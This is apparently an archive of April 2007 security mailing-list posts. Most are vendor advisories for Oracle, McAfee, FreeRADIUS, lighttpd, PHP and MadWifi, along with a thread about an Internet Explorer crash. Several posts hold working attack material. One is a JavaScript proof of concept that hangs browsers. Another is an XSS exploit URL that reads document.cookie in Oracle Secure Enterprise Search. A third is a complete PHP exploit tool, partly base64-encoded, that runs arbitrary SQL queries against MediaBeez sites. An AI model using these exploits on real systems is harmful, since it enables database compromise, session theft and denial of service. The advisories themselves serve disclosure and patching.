Re: Internet Explorer Crash
Actually, I just get a message that says A script on this page is causing Internet Explorer to run slowly. But my CPU usage for iexplore.exe is only at 20, and my system didn't slow down in the least. I went ahead and told IE to continue to run the script, and pops up again in a bit asking me the same thing. Finally bored, I say no and it immediately came up with Goodbye on the page. If this actually makes Safari and Konqueror crash, why the stop using Microsoft products recommendation? At least IE is smart enough to tell me that your little stupidInternetExploder script is being pesky. t - Original Message - From: J. Oquendo [EMAIL PROTECTED] To: bugtraq@securityfocus.com Sent: Tuesday, April 17, 2007 10:09 AM Subject: Internet Explorer Crash -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Product: Internet Explorer Version 7.0.5730.11 Impact: Browser crash possibly more Author: Jesus Oquendo echo @infiltrated|sed 's/^/sil/g;s/$/.net/g' I. BACKGROUND Why bother? Who doesn't know what Internet Explorer and Microsoft are. II. DESCRIPTION IE 7 is vulnerable to a script which causes the browser to hang. The memory and CPU usage go through the roof. Originally the script caused (and still causes) Safari and Konqueror to crash. III SOLUTION Stop using Microsoft products or deal with a new advisory every other day. IV. Proof http://www.infiltrated.net/stupidInternetExploder.html V. Code $ more /stupidInternetExploder.html script var reg = /(.)*/; var z = 'Z'; while (z.length = 999 99 99 99 99) z+=z; var boum = reg.exec(z); /script Goodbye J. Oquendo http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0x1383A743 sil . infiltrated @ net http://www.infiltrated.net The happiness of society is the end of government. John Adams -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.3 (FreeBSD) iD8DBQFGJQGJh3J3NhODp0MRArt5AKCVI+A0rHdYMOz9KYIbCxFkMN8QcgCbBBBC TCV7FOqA05H8sSDb0r8nSnk= =J/DW -END PGP SIGNATURE-
[ GLSA 200704-14 ] FreeRADIUS: Denial of Service
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200704-14 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: FreeRADIUS: Denial of Service Date: April 17, 2007 Bugs: #174292 ID: 200704-14 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis A memory leak has been discovered in FreeRADIUS, possibly allowing for a Denial of Service. Background == FreeRADIUS is an open source RADIUS authentication server implementation. Affected packages = --- Package/ Vulnerable /Unaffected --- 1 net-dialup/freeradius1.1.6 = 1.1.6 Description === The Coverity Scan project has discovered a memory leak within the handling of certain malformed Diameter format values inside an EAP-TTLS tunnel. Impact == A remote attacker could send a large amount of specially crafted packets to a FreeRADIUS server using EAP-TTLS authentication and exhaust all memory, possibly resulting in a Denial of Service. Workaround == There is no known workaround at this time. Resolution == All FreeRADIUS users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose =net-dialup/freeradius-1.1.6 References == [ 1 ] CVE-2007-2028 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2028 Availability This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200704-14.xml Concerns? = Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to [EMAIL PROTECTED] or alternatively, you may file a bug at http://bugs.gentoo.org. License === Copyright 2007 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 pgpjaEwTdcoZm.pgp Description: PGP signature
Advisory: Bypass Oracle Logon Trigger
NameBypass Oracle Logon Trigger (7826485) [DB05] Systems AffectedOracle 8-10g Rel. 2 SeverityHigh Risk CategoryBypass Security Feature Database Logon Trigger Vendor URL http://www.oracle.com/ Author Alexander Kornbrust (ak at red-database-security.com) Advisory17 April 2007 (V 1.00) Details ### It is possible to bypass the Oracle database logon trigger. This can cause severe security problems. Oracle database logon trigger are often used to restrict user access (e.g. based on time or ip addresses) and/or to do audit entries into (custom) tables. This can be bypassed on unpatched systems. This advisory is available at http://www.red-database-security.com/advisory/bypass_oracle_logon_trigger.html Patch Information # Apply the patches for Oracle CPU April 2007. History ### 07-jun-2006 Oracle secalert was informed 08-jun-2006 Bug confirmed 17-apr-2007 Oracle published CPU April 2007 [DB05] 17-apr-2007 Advisory published Additional Information ## An analysis of the Oracle CPU April 2007 is available here http://www.red-database-security.com/advisory/oracle_cpu_apr_2007.html This document will be updated during the next few days and weeks with the latest information. (c) 2007 by Red-Database-Security GmbH -- http://www.red-database-security.com
Advisory: SQL Injection in package SYS.DBMS_AQADM_SYS
NameSQL Injection in package SYS.DBMS_AQADM_SYS [DB04] Systems AffectedOracle 8i-10g Rel. 2 SeverityHigh Risk CategorySQL Injection Vendor URL http://www.oracle.com/ Author Alexander Kornbrust (ak at red-database-security.com) Advisory17 April 2007 (V 1.00) Details ### The package DBMS_AQADM_SYS contains SQL injection vulnerabilities. This advisory is available at http://www.red-database-security.com/advisory/oracle_sql_injection_dbms_aqadm_sys.html Patch Information # Apply the patches for Oracle CPU April 2007. History ### 01-nov-2005 Oracle secalert was informed 02-nov-2005 Bug confirmed 17-apr-2007 Oracle published CPU April 2007 [DB04] 17-apr-2007 Advisory published Additional Information ## An analysis of the Oracle CPU April 2007 is available here http://www.red-database-security.com/advisory/oracle_cpu_apr_2007.html This document will be updated during the next few days and weeks with the latest information. (c) 2007 by Red-Database-Security GmbH -- http://www.red-database-security.com
Re: Internet Explorer Crash
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Nope. Ran this one against Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.2) Gecko/20061023 SUSE/2.0.0.2-1.1 Firefox/2.0.0.2, and it didn't even flinch. No OOM-killing here. On the other hand, Konqueror 3.5.5 release 45.4 churned swap madly for about five minutes (the machine continued to run well enough if just a bit slower) until Konq sig-sixed itself. Cheers The Anarcat wrote: Actually, this also crashes Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.3) Gecko/20070310 Iceweasel/2.0.0.3 (Debian-2.0.0.3-1) I would think that Firefox and most browsers implementing javascript would die an horrible OOM death on this. A. On Tue, Apr 17, 2007 at 01:09:13PM -0400, J. Oquendo wrote: Product: Internet Explorer Version 7.0.5730.11 Impact: Browser crash possibly more Author: Jesus Oquendo echo @infiltrated|sed 's/^/sil/g;s/$/.net/g' I. BACKGROUND Why bother? Who doesn't know what Internet Explorer and Microsoft are. II. DESCRIPTION IE 7 is vulnerable to a script which causes the browser to hang. The memory and CPU usage go through the roof. Originally the script caused (and still causes) Safari and Konqueror to crash. III SOLUTION Stop using Microsoft products or deal with a new advisory every other day. IV. Proof http://www.infiltrated.net/stupidInternetExploder.html V. Code $ more /stupidInternetExploder.html script var reg = /(.)*/; var z = 'Z'; while (z.length = 999 99 99 99 99) z+=z; var boum = reg.exec(z); /script Goodbye J. Oquendo http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0x1383A743 sil . infiltrated @ net http://www.infiltrated.net The happiness of society is the end of government. John Adams -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.5 (GNU/Linux) Comment: Using GnuPG with SUSE - http://enigmail.mozdev.org iD8DBQFGJVHvtHLm/XkyJlsRApr1AKCLOVJLSHhSRV9edwUm2QNLNry9RwCgxFeX N1X/wJSO4U4Sx3z5Yn0S6Tk= =T/tc -END PGP SIGNATURE-
Advisory: XSS Vulnerability in Oracle Secure Enterprise Search [SES01]
NameCross-Site-Scripting Vulnerability in Oracle Secure Enterprise Search Systems AffectedOracle Secure Enterprise Search 10.1.6- SES SeverityMedium Risk CategoryCross Site Scripting (XSS/CSS) Vendor URL http://www.oracle.com/ Author Alexander Kornbrust (ak at red-database-security.com) Date17 April 2007 (V 1.00) Details ### Oracle Secure Enterprise Search 10g, a standalone product from Oracle, enables a secure, high quality, easy-to-use search across all enterprise information assets. The parameter EXPTYPE in boundary_rules.jsp contains a cross site scripting vulnerability. This advisory is available at http://www.red-database-security.com/advisory/oracle_css_ses.html Exploit ### http://ses10106:/search/admin/sources/boundary_rules.jsp?event=deleteIncludeRulep_src=webp_mode=editp_id=3pattern=rdsexpType=%3Cscript%3Ealert(document.cookie)%3C/script%3ECC_SIMPLE_INCLUSION' Affected Products # Oracle Enterprise Search Patch Information # Please upgrade to the latest version of SES or apply CPU April 2007. History ### 05-Apr-2005 Oracle secalert was informed 06-Apr-2005 Bug confirmed 17-apr-2007 Oracle published CPU April 2007 17-apr-2007 Red-Database-Security published this advisory Additional Information ## An analysis of the Oracle CPU April 2007 is available here http://www.red-database-security.com/advisory/oracle_cpu_apr_2007.html This document will be updated during the next few days and weeks with the latest information. (c) 2007 by Red-Database-Security GmbH -- http://www.red-database-security.com
Advisory: Shutdown unprotected Oracle TNS Listener via Oracle Discoverer Servlet [AS01]
NameShutdown unprotected TNS Listener via Oracle Discoverer Servlet [AS01] Systems AffectedOracle Discoverer Servlet SeverityLow Risk CategoryRemote D.o.S. Vendor URL http://www.oracle.com/ Author Alexander Kornbrust (ak at red-database-security.com) Advisory17 April 2007 (V 1.00) Details ### The Oracle Discoverer Servlet contains a field for the database/tns alias. It is possible to send TNS STOP commands via this field and to shutdown unprotected Oracle TNS Listener. This advisory is available at http://www.red-database-security.com/advisory/oracle_discoverer_servlet.html Patch Information ## Apply the patches for Oracle CPU April 2007. History ### 28-oct-2003 Oracle secalert was informed 29-oct-2003 Bug confirmed 17-apr-2007 Oracle published CPU April 2007 [AS01] 17-apr-2007 Advisory published Additional Information ## An analysis of the Oracle CPU April 2007 is available here http://www.red-database-security.com/advisory/oracle_cpu_apr_2007.html This document will be updated during the next few days and weeks with the latest information. (c) 2007 by Red-Database-Security GmbH -- http://www.red-database-security.com
iDefense Security Advisory 04.17.07: McAfee VirusScan On-Access Scanner Long Unicode File Name Buffer Overflow
McAfee VirusScan On-Access Scanner Long Unicode File Name Buffer Overflow iDefense Security Advisory 04.17.07 http://labs.idefense.com/intelligence/vulnerabilities/ Apr 17, 2007 I. BACKGROUND McAfee VirusScan is an AntiVirus application that offers protection against the latest computer virus threats. More information can be found on the vendor's site at the following URL. http://www.mcafee.com/us/enterprise/products/anti_virus/file_servers_desktops/virusscan_enterprise_80i.html II. DESCRIPTION Remote exploitation of a buffer overflow vulnerability in McAfee's VirusScan Antivirus application allows attackers to disable the On-Access scanner or potentially execute arbitrary code with SYSTEM privileges. The McAfee On-Access scanner component contains a common software flaw that leads to heap corruption when dealing with overly long file names that contain multi-byte characters. This flaw only manifests itself when the target system has East Asia language files installed and the default Unicode codepage is set to a language which contains multi-byte characters such as Chinese. III. ANALYSIS Exploitation allows attackers to disable the On-Access Scanner component of McAfee VirusScan or potentially execute arbitrary code with SYSTEM privileges. In order to exploit this vulnerability, an attacker needs to be able to place a file with an overly long file name on the victims computer. The file name would have to contain multi-byte characters such as Chinese native characters. If the On-Access scanner is enabled, simply hovering the mouse over the file to view the file properties or attempting to open the file will trigger the overflow. Standard archive manipulation programs such as WinZip and Windows Compressed Folder viewer cannot handle files capable of exploiting this vulnerability. IV. DETECTION iDefense has confirmed this vulnerability in McAfee VirusScan 8.0 Enterprise. Previous versions are suspected vulnerable as well. V. WORKAROUND iDefense is currently unaware of any workarounds for this issue. VI. VENDOR RESPONSE McAfee has addressed this vulnerability in Patch 12 of VirusScan Enterprise 8.0i. They recommend installing the latest available patch (Patch15). More information is available in McAfee's Security Bulletin 612750 at the following URL. https://knowledge.mcafee.com/SupportSite/dynamickc.do?externalId=612750command=showforward=nonthreadedKC VII. CVE INFORMATION A Mitre Corp. Common Vulnerabilities and Exposures (CVE) number has not been assigned yet. VIII. DISCLOSURE TIMELINE 02/08/2007 Initial vendor notification 02/08/2007 Initial vendor response 04/17/2007 Coordinated public disclosure IX. CREDIT This vulnerability was discovered by iDefense Labs. Get paid for vulnerability research http://labs.idefense.com/methodology/vulnerability/vcp.php Free tools, research and upcoming events http://labs.idefense.com/ X. LEGAL NOTICES Copyright © 2007 iDefense, Inc. Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of iDefense. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please e-mail [EMAIL PROTECTED] for permission. Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information.
Analysis of the Oracle April 2007 Critical Patch Update
Hey all, I've just posted an analysis of the Oracle April 2007 Critical Patch Update to http://www.ngssoftware.com/research/papers/NGSSoftware-OracleCPUAPR2007.pdf (URL may line wrap) Cheers, David Litchfield -- E-MAIL DISCLAIMER The information contained in this email and any subsequent correspondence is private, is solely for the intended recipient(s) and may contain confidential or privileged information. For those other than the intended recipient(s), any disclosure, copying, distribution, or any other action taken, or omitted to be taken, in reliance on such information is prohibited and may be unlawful. If you are not the intended recipient and have received this message in error, please inform the sender and delete this mail and any attachments. The views expressed in this email do not necessarily reflect NGS policy. NGS accepts no liability or responsibility for any onward transmission or use of emails and attachments having left the NGS domain. NGS and NGSSoftware are trading names of Next Generation Security Software Ltd. Registered office address: 52 Throwley Way, Sutton, SM1 4BF with Company Number 04225835 and VAT Number 783096402
rPSA-2007-0072-1 lighttpd
rPath Security Advisory: 2007-0072-1 Published: 2007-04-18 Products: rPath Linux 1 Rating: Major Exposure Level Classification: Remote Deterministic Denial of Service Updated Versions: lighttpd=/[EMAIL PROTECTED]:devel//1/1.4.15-0.1-1 References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1869 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1870 https://issues.rpath.com/browse/RPL-1218 Description: Previous versions of the lighttpd package are vulnerable to two denial of service attacks. One is a remote denial of service that can cause lighttpd to consume all available CPU time and stop serving requests, and the other is a denial of service attack which generally requires a local user to create a file with an mtime of 0; the lighttpd daemon will crash when attempting to serve that file. This crash does not enable any arbitrary or directed code execution.
Reminder: HITBSecConf2007 - Malaysia: Call for Papers closing in 2 weeks
Greetings from sunny Malaysia! This is a reminder that the Call for Papers for the upcoming HITBSecConf2007 - Malaysia is closing on the 1st of May. HITBSecConf2007 - Malaysia is set to take place from the 3rd till the 6th of September in Kuala Lumpur. Our event last year attracted over 600 attendees from all corners of the globe and this year we are expecting this number to grow to well over 800. In addition, the event will feature 4 keynote speakers, 40 researchers, 7 tracks of hands-on technical trainings, a dual-track security conference, capture the flag competition, a lock picking village, zone-h/hitb hacking challenge, bzflag competition and one MASSIVE post conference party!!! If you only attend ONE event this year; make sure its HITBSecConf2007 - Malaysia; Asia's largest network security conference!
rPSA-2007-0073-1 php php-mysql php-pgsql
rPath Security Advisory: 2007-0073-1 Published: 2007-04-18 Products: rPath Linux 1 Rating: Severe Exposure Level Classification: Remote System User Deterministic Unauthorized Access Updated Versions: php=/[EMAIL PROTECTED]:devel//1/4.3.11-15.10-1 php-mysql=/[EMAIL PROTECTED]:devel//1/4.3.11-15.10-1 php-pgsql=/[EMAIL PROTECTED]:devel//1/4.3.11-15.10-1 References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1285 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1286 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1583 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1711 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1001 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0455 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0906 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0910 https://issues.rpath.com/browse/RPL-1268 Description: Previous versions of the php package are vulnerable to many attacks, the worst of which enable various remote attackers to run arbitrary code as the apache user. These vulnerabilities are exposed by a wide variety of applications written in the PHP language.
[ GLSA 200704-15 ] MadWifi: Multiple vulnerabilities
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200704-15 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: MadWifi: Multiple vulnerabilities Date: April 17, 2007 Bugs: #173434 ID: 200704-15 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis Multiple vulnerabilities have been discovered in the MadWifi driver, possibly leading to a Denial of Service and information disclosure. Background == The MadWifi driver provides support for Atheros based IEEE 802.11 Wireless Lan cards. Affected packages = --- Package / Vulnerable / Unaffected --- 1 net-wireless/madwifi-ng0.9.3= 0.9.3 Description === The driver does not properly process Channel Switch Announcement Information Elements, allowing for an abnormal channel change. The ieee80211_input() function does not properly handle AUTH frames and the driver sends unencrypted packets before WPA authentication succeeds. Impact == A remote attacker could send specially crafted AUTH frames to the vulnerable host, resulting in a Denial of Service by crashing the kernel. A remote attacker could gain access to sensitive information about network architecture by sniffing unencrypted packets. A remote attacker could also send a Channel Switch Count less than or equal to one to trigger a channel change, resulting in a communication loss and a Denial of Service. Workaround == There is no known workaround at this time. Resolution == All MadWifi users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose =net-wireless/madwifi-ng-0.9.3 References == [ 1 ] CVE-2007-7178 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-7178 [ 2 ] CVE-2007-7179 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-7179 [ 3 ] CVE-2007-7180 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-7180 Availability This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200704-15.xml Concerns? = Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to [EMAIL PROTECTED] or alternatively, you may file a bug at http://bugs.gentoo.org. License === Copyright 2007 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 pgpF7YihK6Mvi.pgp Description: PGP signature
rPSA-2007-0074-1 dovecot
rPath Security Advisory: 2007-0074-1 Published: 2007-04-18 Products: rPath Linux 1 Rating: Informational Exposure Level Classification: Local User Deterministic Information Exposure Updated Versions: dovecot=/[EMAIL PROTECTED]:devel//1/1.0.0-0.1-1 References: https://issues.rpath.com/browse/RPL-1200 Description: Previous versions of the dovecot package are vulnerable to a trivial information exposure in which files outside the user's mail directory could be opened if the zlib plugin was used.
[ GLSA 200704-13 ] File: Denial of Service
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200704-13 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: File: Denial of Service Date: April 17, 2007 Bugs: #174217 ID: 200704-13 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis A vulnerability has been discovered in file allowing for a denial of service. Background == file is a utility that identifies a file format by scanning binary data for patterns. Affected packages = --- Package/ Vulnerable /Unaffected --- 1 sys-apps/file == 4.20= 4.20-r1 Description === Conor Edberg discovered an error in the way file processes a specific regular expression. Impact == A remote attacker could entice a user to open a specially crafted file, using excessive CPU ressources and possibly leading to a Denial of Service. Note that this vulnerability could be also triggered through an automatic file scanner like amavisd-new. Workaround == There is no known workaround at this time. Resolution == All file users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose =sys-apps/file-4.20-r1 References == [ 1 ] CVE-2007-2026 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2026 Availability This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200704-13.xml Concerns? = Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to [EMAIL PROTECTED] or alternatively, you may file a bug at http://bugs.gentoo.org. License === Copyright 2007 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 pgpLga1jI7X4D.pgp Description: PGP signature
MediaBeez Sql query Execution .. Wear isn't ?? :)
Hello,, Media Beez Sql query execution :) Discovered By : HACKERS PAL Copy rights : HACKERS PAL Website : http://www.soqor.net Email Address : [EMAIL PROTECTED] Sql Execution Exploit .. ?php /***/ /* MediaBeez Sql Query Execution */ /* By : HACKERS PAL [EMAIL PROTECTED] */ /*Website : WwW.SoQoR.NeT */ /***/ error_reporting(0); ini_set(max_execution_time,0); Function get_page($url){if(function_exists(file_get_contents)){$contents=file_get_contents($url);}else{$fp=fopen($url,r);while($line=fread($fp,1024)){$contents=$contents.$line;}}return$contents;} Echo body bgcolor=\#00\ text=\#00FF00\\ntitleMediaBeez Sql query Execution by : HACKERS PAL :: WwW.SoQoR.NeT ::/title\n\r.h2MediaBeez Sql Query Execution\n\r.h3By : HACKERS PAL [EMAIL PROTECTED].h3VisiT My Website [a href=\http://WwW.SoQoR.NeT\;WwW.SoQoR.NeT/a]\n\r; $expl=base64_decode(L3BocC9hZG9kYi9zZXJ2ZXIucGhwP3NxbD17MX0vKg==); $action=$_GET['action']; if($action == ) { echo form action=\$PHP_SELF?action=2\ method=\post\\n Web URL -- Example : http://localhost/mediabeez\n br input type=\text\ name=\url\ style=\width:250\\n br br\n Sql Query br textarea name=\query\ cols=\70\ rows=\5\/textarea\n br\n br div align=\center\\n input type=\submit\ /div\n /form\n ; } else { $exploit=$_POST['url'].str_replace('{1}',''.$_POST['query'].'',str_replace( ,,$expl)); if(!eregi(error,get_page($exploit))) { Echo h1 Query Successfully executed/h1br Thanks For Using This exploit .. Have Fun :)brbrbr; } } die(base64_decode(PGRpdiBhbGlnbj0iY2VudGVyIj4KPGZvbnQgY29sb3I9IiNGRjAwMDAiPgpHPC9mb250Pjxmb250IGNvbG9yPSJ3aGl0ZSI+cjwvZm9udD48Zm9udCBjb2xvcj0iIzAwODAwMCI+RUU8L2ZvbnQ+PGZvbnQgY29sb3I9IndoaXRlIj50PC9mb250Pjxmb250IGNvbG9yPSIjRkYwMDAwIj5aPC9mb250Pjxmb250IGNvbG9yPSJ3aGl0ZSI+CjoKPC9mb250Pgo8Zm9udCBjb2xvcj0iI0ZGMDAwMCI+CkQ8L2ZvbnQ+PGZvbnQgY29sb3I9IndoaXRlIj5ldmk8L2ZvbnQ+PGZvbnQgY29sb3I9IiMwMDgwMDAiPkw8L2ZvbnQ+PGZvbnQgY29sb3I9IndoaXRlIj4tPC9mb250Pjxmb250IGNvbG9yPSIjRkYwMDAwIj4wMDwvZm9udD48Zm9udCBjb2xvcj0id2hpdGUiPgosCjwvZm9udD4KPGZvbnQgY29sb3I9IiNGRjAwMDAiPk08L2ZvbnQ+PGZvbnQgY29sb3I9IndoaXRlIj5vPC9mb250Pjxmb250IGNvbG9yPSIjMDA4MDAwIj5oQTwvZm9udD48Zm9udCBjb2xvcj0id2hpdGUiPmphPC9mb250Pjxmb250IGNvbG9yPSIjRkYwMDAwIj5saSA8L2ZvbnQ+Cjxmb250IGNvbG9yPSIjRkZGRkZGIj4sPC9mb250Pjxmb250IGNvbG9yPSIjRkYwMDAwIj4KRDwvZm9udD48Zm9udCBjb2xvcj0id2hpdGUiPnIuPC9mb250Pjxmb250IGNvbG9yPSIjMDA4MDAwIj5FPC9mb250Pjxmb250IGNvbG9yPSJ3aGl0ZSI+eDwvZm9udD48Zm9udCBjb2xvcj0iI0ZGMDAwMCI+RTwvZm9udD48Zm9udCBjb2xvcj0id2hpdGU iPgosCjwvZm9udD4KPGZvbnQgY29sb3I9IiNGRjAwMDAiPgpHPC9mb250Pjxmb250IGNvbG9yPSJ3aGl0ZSI+YUNrZTwvZm9udD48Zm9udCBjb2xvcj0iI0ZGMDAwMCI+UjwvZm9udD48Zm9udCBjb2xvcj0id2hpdGUiPiAsCjwvZm9udD4KPGZvbnQgY29sb3I9IiNGRjAwMDAiPlM8L2ZvbnQ+PGZvbnQgY29sb3I9IndoaXRlIj5wPC9mb250Pjxmb250IGNvbG9yPSIjMDA4MDAwIj4xZDwvZm9udD48Zm9udCBjb2xvcj0id2hpdGUiPmU8L2ZvbnQ+PGZvbnQgY29sb3I9IiNGRjAwMDAiPlI8L2ZvbnQ+PGZvbnQgY29sb3I9IndoaXRlIj5fPC9mb250Pjxmb250IGNvbG9yPSIjRkYwMDAwIj5OPC9mb250Pjxmb250IGNvbG9yPSJ3aGl0ZSI+ZXQgLAo8L2ZvbnQ+Cjxmb250IGNvbG9yPSIjRkYwMDAwIj5CPC9mb250Pjxmb250IGNvbG9yPSJ3aGl0ZSI+bGFjawo8L2ZvbnQ+Cjxmb250IGNvbG9yPSIjRkYwMDAwIj5BPC9mb250Pjxmb250IGNvbG9yPSJ3aGl0ZSI+dHRhQzwvZm9udD48Zm9udCBjb2xvcj0iIzAwODAwMCI+azwvZm9udD48Zm9udCBjb2xvcj0id2hpdGUiPiAsCjwvZm9udD4KPGZvbnQgY29sb3I9IiNGRjAwMDAiPk08L2ZvbnQ+PGZvbnQgY29sb3I9IndoaXRlIj5pbmk8L2ZvbnQ+PGZvbnQgY29sb3I9IiNGRjAwMDAiPk08L2ZvbnQ+PGZvbnQgY29sb3I9IndoaXRlIj5hPC9mb250Pjxmb250IGNvbG9yPSIjMDA4MDAwIj5uPC9mb250Pjxmb250IGNvbG9yPSJ3aGl0ZSI+ICwKPC9mb250Pgo8Zm9u dCBjb2xvcj0iI0ZGMDAwMCI+SjwvZm9udD48Zm9udCBjb2xvcj0id2hpdGUiPmE8L2ZvbnQ+PGZvbnQgY29sb3I9IiMwMDgwMDAiPnJlPC9mb250Pjxmb250IGNvbG9yPSJ3aGl0ZSI+ZTwvZm9udD48Zm9udCBjb2xvcj0iI0ZGMDAwMCI+SDwvZm9udD48Zm9udCBjb2xvcj0id2hpdGUiPjxmb250IGNvbG9yPSIjRkYwMDAwIj4KQjwvZm9udD48Zm9udCBjb2xvcj0id2hpdGUiPmE8L2ZvbnQ+PC9mb250Pjxmb250IGNvbG9yPSIjMDA4MDAwIj5naDwvZm9udD48Zm9udCBjb2xvcj0id2hpdGUiPmRhPC9mb250Pjxmb250IGNvbG9yPSIjRkYwMDAwIj5EPC9mb250Pjxmb250IGNvbG9yPSIjRkZGRkZGIj4KLCA8L2ZvbnQ+PGZvbnQgY29sb3I9IiNGRjAwMDAiPkQ8L2ZvbnQ+PGZvbnQgY29sb3I9IiNGRkZGRkYiPnIgPC9mb250Pgo8Zm9udCBjb2xvcj0iI0ZGMDAwMCI+SDwvZm9udD48Zm9udCBjb2xvcj0iI0ZGRkZGRiI+YTwvZm9udD48Zm9udCBjb2xvcj0iIzAwODAwMCI+Y2s8L2ZvbnQ+PGZvbnQgY29sb3I9IiNGRkZGRkYiPmU8L2ZvbnQ+PGZvbnQgY29sb3I9IiNGRjAwMDAiPnI8L2ZvbnQ+PGZvbnQgY29sb3I9IiNGRkZGRkYiPgosPC9mb250Pjxmb250IGNvbG9yPSJ3aGl0ZSI+PGJyPgo8L2ZvbnQ+Cjxmb250IGNvbG9yPSIjRkYwMDAwIj5TPC9mb250Pjxmb250IGNvbG9yPSJ3aGl0ZSI+cDwvZm9udD48Zm9udCBjb2xvcj0iIzAwODAwMCI+ZWM8L2ZvbnQ+PGZvbnQgY29sb3I9IndoaXRlIj5pYTwvZ
Re: Internet Explorer Crash
Actually Yes, the PoC crashing my IE, make it hang and my CPU usage goes to 100%, and i'm using Internet Explorer 7.0.5730.11 like he said. Tom Thor (Hammer of God) wrote: Actually, I just get a message that says A script on this page is causing Internet Explorer to run slowly. But my CPU usage for iexplore.exe is only at 20, and my system didn't slow down in the least. I went ahead and told IE to continue to run the script, and pops up again in a bit asking me the same thing. Finally bored, I say no and it immediately came up with Goodbye on the page. If this actually makes Safari and Konqueror crash, why the stop using Microsoft products recommendation? At least IE is smart enough to tell me that your little stupidInternetExploder script is being pesky. t - Original Message - From: J. Oquendo [EMAIL PROTECTED] To: bugtraq@securityfocus.com Sent: Tuesday, April 17, 2007 10:09 AM Subject: Internet Explorer Crash Product: Internet Explorer Version 7.0.5730.11 Impact: Browser crash possibly more Author: Jesus Oquendo echo @infiltrated|sed 's/^/sil/g;s/$/.net/g' I. BACKGROUND Why bother? Who doesn't know what Internet Explorer and Microsoft are. II. DESCRIPTION IE 7 is vulnerable to a script which causes the browser to hang. The memory and CPU usage go through the roof. Originally the script caused (and still causes) Safari and Konqueror to crash. III SOLUTION Stop using Microsoft products or deal with a new advisory every other day. IV. Proof http://www.infiltrated.net/stupidInternetExploder.html V. Code $ more /stupidInternetExploder.html script var reg = /(.)*/; var z = 'Z'; while (z.length = 999 99 99 99 99) z+=z; var boum = reg.exec(z); /script Goodbye J. Oquendo http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0x1383A743 sil . infiltrated @ net http://www.infiltrated.net The happiness of society is the end of government. John Adams
Re: [Full-disclosure] A Botted Fortune 500 a Day
